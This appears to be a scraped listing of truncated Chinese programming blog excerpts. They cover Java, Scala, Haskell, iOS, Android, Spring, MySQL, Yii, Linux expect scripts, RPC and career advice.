使用文本编辑器录入文章存入数据中的文本是HTML标签格式，由于业务需要对HTML标签进行去除只保留纯净的文本内容，于是乎Java实现自动过滤。如下： public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt
嵌入式系统设计中常用总线和接口 aijuans linux 基础
嵌入式系统设计中常用总线和接口任何一个微处理器都要与一定数量的部件和外围设备连接，但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接，那么连线
Java函数调用方式——按值传递 ayaoxinchao java 按值传递对象基础数据类型
Java使用按值传递的函数调用方式，这往往使我感到迷惑。因为在基础数据类型和对象的传递上，我就会纠结于到底是按值传递，还是按引用传递。其实经过学习，Java在任何地方，都一直发挥着按值传递的本色。首先，让我们看一看基础数据类型是如何按值传递的。 public static void main(String[] args) { int a = 2;
ios音量线性下降 bewithme ios音量
直接上代码吧 //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume;
与其怨它不如爱它 bijian1013 选择理想职业规划
抱怨工作是年轻人的常态，但爱工作才是积极的心态，与其怨它不如爱它。一般来说，在公司干了一两年后，不少年轻人容易产生怨言，除了具体的埋怨公司“扭门”，埋怨上司无能以外，也有许多人是因为根本不爱自已的那份工作，工作完全成了谋生的手段，跟自已的性格、专业、爱好都相差甚远。
一边时间不够用一边浪费时间 bingyingao 工作时间浪费
一方面感觉时间严重不够用，另一方面又在不停的浪费时间。每一个周末，晚上熬夜看电影到凌晨一点，早上起不来一直睡到10点钟，10点钟起床，吃饭后玩手机到下午一点。精神还是很差，下午像一直野鬼在城市里晃荡。为何不尝试晚上10点钟就睡，早上7点就起，时间完全是一样的，把看电影的时间换到早上，精神好，气色好，一天好状态。控制让自己周末早睡早起，你就成功了一半。有多少个工作
【Scala八】Scala核心二：隐式转换 bit1129 scala
Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con
sudoku slover in Haskell (2) bookjovi haskell sudoku
继续精简haskell版的sudoku程序，稍微改了一下，这次用了8行，同时性能也提高了很多，对每个空格的所有解不是通过尝试算出来的，而是直接得出。 board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7,
Java-Collections Framework学习与总结-HashSet和LinkedHashSet BrokenDreams linkedhashset
本篇总结一下两个常用的集合类HashSet和LinkedHashSet。它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合；之前总结过的java.util.List表示一种元素可重复且有序
读《研磨设计模式》-代码笔记-备忘录模式-Memento bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是，在不破坏封装性的前提下，捕获一个对象的内部状态，并在对象之外保存这个状态，为以后的状态恢复作“备忘”
《RAW格式照片处理专业技法》笔记 cherishLC PS
注意，这不是教程！仅记录楼主之前不太了解的一、色彩（空间）管理作者建议采用ProRGB（色域最广），但camera raw中设为ProRGB，而PS中则在ProRGB的基础上，将gamma值设为了1.8（更符合人眼）注意：bridge、camera raw怎么设置显示、输出的颜色都是正确的（会读取文件内的颜色配置文件），但用PS输出jpg文件时，必须先用Edit->conv
使用 Git 下载 Spring 源码编译 for Eclipse crabdave eclipse
使用 Git 下载 Spring 源码编译 for Eclipse 1、安装gradle，下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME，配置PATH %GRADLE_HOME%/bin，cmd，gradle -v 2、spring4 用jdk8 下载 https://jdk8.java.
mysql连接拒绝问题 daizj mysql 登录权限
mysql中在其它机器连接mysql服务器时报错问题汇总一、[running][email protected]:~$mysql -uroot -h 192.168.9.108 -p //带-p参数，在下一步进行密码输入 Enter password: //无字符串输入 ERROR 1045 (28000): Access
Google Chrome 为何打压 H.264 dsjt apple html5 chrome Google
Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准，Chrome 将在几个月后正式停止对 H.264 视频解码的支持，全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示，自从 WebM 视频编解码器推出以后，在性能、厂商支持以及独立性方面已经取得了很大的进步，为了与 Chromium 现有支持的編解码器保持一致，Chrome
yii 获取控制器名和方法名 dcj3sjt126com yii framework
1. 获取控制器名在控制器中获取控制器名: $name = $this->getId(); 在视图中获取控制器名: $name = Yii::app()->controller->id; 2. 获取动作名在控制器beforeAction()回调函数中获取动作名: $name =
Android知识总结（二） come_for_dream android
明天要考试了，速速总结如下 1、Activity的启动模式 standard：每次调用Activity的时候都创建一个（可以有多个相同的实例，也允许多个相同Activity叠加。） singleTop：可以有多个实例，但是不允许多个相同Activity叠加。即，如果Ac
高洛峰收徒第二期：寻找未来的“技术大牛” ——折腾一年，奖励20万元 gcq511120594 工作项目管理
高洛峰，兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖！首期现在的进程刚刚过半，徒弟们真的很棒，人品都没的说，团结互助，学习刻苦，工作认真积极，灵活上进。我几乎会把他们全部留下来，现在已有一多半安排了实际的工作，并取得了很好的成绩。等他们出徒之日，凭他们的能力一定能够拿到高薪，而且我还承诺过一个徒弟，当他拿到大学毕
linux expect heipark expect
1. 创建、编辑文件go.sh #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact 2. 设置权限 chmod u+x go.sh 3.
Spring4.1新特性——静态资源处理增强 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
idea ubuntuxia 乱码 liyonghui160com
1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个字体文件。 2.在ubuntu 下可以执行下面操作安装该字体： sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v
改良程序的11技巧 pda158 技巧
有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点，程序你只写一次，但以后会无数次的阅读。当你第二天回头来看你的代码时，你就要开始阅读它了。当你把代码拿给其他人看时，他必须阅读你的代码。因此，在编写时多花一点时间，你会在阅读它时节省大量的时间。让我们看一些基本的编程技巧：尽量保持方法简短永远永远不要把同一个变量用于多个不同的
300个涵盖IT各方面的免费资源（下）——工作与学习篇 shoothao 创业免费资源学习课程远程工作
工作与生产效率: A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co
深入浅出RPC uule rpc
深入浅出RPC-浅出篇深入浅出RPC-深入篇 RPC Remote Procedure Call Protocol 远程过程调用协议它是一种通过网络从远程计算机程序上请求服务，而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在，如TCP或UDP，为通信程序之间携带信息数据。在OSI网络通信模型中，RPC跨越了传输层和应用层。RPC使得开发